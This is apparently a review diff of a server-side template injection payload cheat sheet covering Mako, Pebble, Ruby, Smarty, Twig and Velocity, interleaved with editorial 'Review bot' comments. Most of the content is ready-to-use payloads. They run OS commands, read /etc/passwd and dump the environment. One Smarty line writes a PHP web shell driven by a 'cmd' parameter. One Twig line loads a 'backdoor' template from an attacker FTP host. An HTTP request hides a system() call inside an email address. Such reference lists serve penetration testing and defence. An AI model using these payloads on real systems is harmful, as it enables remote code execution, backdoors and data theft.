### Lessjs - SSRF / LFI
|
### Lessjs - SSRF / LFI
|
||||||
|
|
||||||
```less
|
```less
|
||||||
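Review bot: the Lessjs description quote keeps a second sentence, `This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles.`, which is the website's self-reference rather than a description of the engine; trim the quote to its first sentence so it reads like the other engine descriptions. The Handlebars and ASP.NET Razor sections removed here are pure moves, so nothing else in this hunk needs attention.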
@ -715,6 +519,263 @@ registerPlugin({
|
|||||||
})
|
})
|
||||||
```
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Mako
|
||||||
|
|
||||||
|
[Official website](https://www.makotemplates.org/)
|
||||||
|
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
|
||||||
|
|
||||||
|
```python
|
||||||
|
<%
|
||||||
|
import os
|
||||||
|
x=os.popen('id').read()
|
||||||
|
%>
|
||||||
|
${x}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Direct access to os from TemplateNamespace:
|
||||||
|
|
||||||
|
Any of these payloads allows direct access to the `os` module
|
||||||
|
|
||||||
|
```python
|
||||||
|
${self.module.cache.util.os.system("id")}
|
||||||
|
${self.module.runtime.util.os.system("id")}
|
||||||
|
${self.template.module.cache.util.os.system("id")}
|
||||||
|
${self.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.__init__.__globals__['util'].os.system('id')}
|
||||||
|
${self.template.module.runtime.util.os.system("id")}
|
||||||
|
${self.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.__init__.__globals__['os'].system('id')}
|
||||||
|
${self.module.cache.util.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.util.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.cache.util.os.system("id")}
|
||||||
|
${self.template.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.module.cache.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template._mmarker.module.runtime.util.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
|
||||||
|
${self.template.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.template.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.module.filters.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.module.runtime.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
|
||||||
|
${self.context._with_template.module.cache.util.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
|
||||||
|
${self.template.module.cache.util.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.runtime.util.os.system("id")}
|
||||||
|
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
|
||||||
|
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
|
||||||
|
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
|
||||||
|
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
|
||||||
|
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||||
|
```
|
||||||
|
|
||||||
|
PoC :
|
||||||
|
|
||||||
|
```python
|
||||||
|
>>> print(Template("${self.module.cache.util.os}").render())
|
||||||
|
<module 'os' from '/usr/local/lib/python3.10/os.py'>
|
||||||
|
```
|
||||||
|
|
||||||
|
Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)


---

## Pebble

[Official website](https://pebbletemplates.io/)
> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.

### Pebble - Basic injection

```java
{{ someString.toUPPERCASE() }}
```

### Pebble - Code execution

Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`.

New version of Pebble :

```java
{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke(null,null)
     .exec(cmd)
     .inputStream
     .readAllBytes() %}
{{ (1).TYPE
     .forName('java.lang.String')
     .constructors[0]
     .newInstance(([bytes]).toArray()) }}
```
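Review bot: `.methods[6]` in the new-version Pebble payload depends on the order in which `Class.getMethods()` returns members, which the Java documentation leaves unspecified and which differs between JDK builds, so on another runtime the index silently selects a different method; a sentence saying the index is runtime-specific would spare readers a confusing failure. Also worth a check: the basic-injection line uses `toUPPERCASE()` while the Java method is `toUpperCase()`; if Pebble resolves member names case-insensitively that should be stated, otherwise the capitalisation is a typo.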


---

## Ruby

### Ruby - Basic injections

ERB:

```ruby
<%= 7 * 7 %>
```

Slim:

```ruby
#{ 7 * 7 }
```

### Ruby - Retrieve /etc/passwd

```ruby
<%= File.open('/etc/passwd').read %>
```

### Ruby - List files and directories

```ruby
<%= Dir.entries('/') %>
```

### Ruby - Code execution

Execute code using SSTI for ERB engine.

```ruby
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```

Execute code using SSTI for Slim engine.

```powershell
#{ %x|env| }
```
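Review bot: the Slim command-execution block that closes this section is fenced as ```powershell, but `#{ %x|env| }` is Ruby/Slim interpolation exactly like the `#{ 7 * 7 }` block above it; tagging it ```ruby keeps the highlighting consistent with the rest of the Ruby section.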


---

## Smarty

[Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP.

```python
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
```
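Review bot: the Smarty block is fenced as ```python although every line is Smarty/PHP template syntax; ```php (or ```smarty) would be the matching tag. The `//deprecated in smarty v3` annotation also understates the situation: the `{php}` tag was deprecated in Smarty 3 and removed outright in Smarty 4, so that payload line applies only to Smarty 2 and to 3.x deployments that still enable it.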


---

## Twig

[Official website](https://twig.symfony.com/)
> Twig is a modern template engine for PHP.

### Twig - Basic injection

```python
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
{{app.request.server.all|join(',')}}
```

### Twig - Template format

```python
$output = $twig > render (
  'Dear' . $_GET['custom_greeting'],
  array("first_name" => $user.first_name)
);

$output = $twig > render (
  "Dear {first_name}",
  array("first_name" => $user.first_name)
);
```

### Twig - Arbitrary File Reading

```python
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
```

### Twig - Code execution

```python
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
```

Example with an email passing FILTER_VALIDATE_EMAIL PHP.

```powershell
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
```
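Review bot: in the Template format block `$twig > render (` is not valid PHP; the method-call arrow was lost and both occurrences should read `$twig->render(`. The point of that block is the contrast between concatenating `$_GET['custom_greeting']` into the template source (injectable) and passing the value as a template variable (not), and the typo obscures it. Two smaller points: the trailing `@` on the `file_excerpt` line looks like a leftover from the email-style payload at the end of the section, and the Twig blocks are fenced as ```python / ```powershell although their content is Twig and a raw HTTP request; ```twig and ```http would match.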


---

## Velocity

[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.

```python
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
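Review bot: the Velocity payload relies on `$class` being present in the context, i.e. the ClassTool shipped with VelocityTools, which a plain Velocity Engine does not provide; stating that precondition next to the block would make clear why it fails against applications that expose no such tool. The block is also fenced as ```python while the content is VTL; ```velocity would match.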


---

## References

* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)